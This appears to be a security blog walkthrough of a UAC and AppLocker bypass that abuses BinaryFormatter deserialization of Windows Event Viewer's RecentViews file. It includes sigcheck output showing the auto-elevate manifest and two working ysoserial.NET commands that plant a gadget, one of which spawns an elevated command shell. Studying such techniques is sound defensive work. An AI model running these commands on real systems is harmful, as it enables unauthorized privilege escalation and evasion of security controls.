We will be focussing on the .Net Deserialization vulnerability in Event Viewer to bypass User Account Control, to elevate ourselves to a higher integrity user,
and AppLocker.
Originally discovered by @orange_8361, when we open up Event Viewer and look at Process Monitor, we can see that it actually tries to query and open up a file called
RecentViews.
The file is located at C:\Users\<username>\AppData\Local\Microsoft\Event Viewer\RecentViews.
Note: If the file is not present, you can simply browse through Event Viewer and check some logs, which will then create the
RecentViewsfile.
Let's take a look at the file.
We can see some unprintable characters(binary) and some ascii relating to .NET classes like System.Collections.ArrayList. Hence most likely, this is a
.NET object that has been serialized using a Binary Formatter.
However, the docs from Microsoft itself says that the BinaryFormatter is insecure and should not be used.
The fact that the Windows Event Viewer deserializes it using the BinaryFormatter to show the contents in the recent events user interface, poses a Insecure Deserialization Vulnerabilty.
Another interesting thing to note is the manifest of EventViewer itself.
Using a tool like sigcheck.exe, we can see that the manifest of eventvwr.exe is set to auto-elevate.
C:\Users\wirel\OneDrive\Documents\SigCheck>sigcheck64.exe -m C:\Windows\System32\eventvwr.exe
Sigcheck v2.82 - File version and signature viewer
Copyright (C) 2004-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
c:\windows\system32\eventvwr.exe:
Verified: Signed
Signing date: 3:09 pm 29/4/2022
Publisher: Microsoft Windows
Company: Microsoft Corporation
Description: Event Viewer Snapin Launcher
Product: Microsoft« Windows« Operating System
Prod version: 10.0.22000.653
File version: 10.0.22000.653 (WinBuild.160101.0800)
MachineType: 64-bit
Manifest:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
<assemblyIdentity
version="5.1.0.0"
processorArchitecture="amd64"
name="Microsoft.Windows.Eventlog.EventVwr"
type="win32"
/>
<description>Event Viewer Snapin Launcher</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="highestAvailable"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<autoElevate>true</autoElevate>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>We can see the xml element <autoElevate>true</autoElevate> which allows eventviewer to bypass uac.
We thus could create a Deserialization gadget to execute any files, bypassing UAC and Applocker.
We can use ysoserial .NET to create our Deserialization gadget.
I have set my UAC permissions to the max.
If i were to open taskmgr, we can see UAC intefering with us.
Now let's use ysoserial .NET to create our Deserialization gadget.
ysoserial.exe -o raw -g DataSet -f BinaryFormatter -c taskmgr >
"C:\Users\wirel\AppData\Local\Microsoft\Event Viewer\RecentViews"Now when we open up EventViewer, it will be succum to insecure deserialization and open our task manager, bypassing UAC. This technique can also be used to bypass Applocker.
If this was an Admin account, attackers can easily spawn an elevated Administrator shell.
ysoserial.exe --output=raw --gadget=DataSet --formatter=BinaryFormatter
--command=powershell "start cmd -v runAs" --rawcmd >
"C:\Users\wirel\AppData\Local\Microsoft\Event Viewer\RecentViews"
We have just spawned an elevated command shell from a non-elevated Administrator perspective, bypassing UAC and Applocker.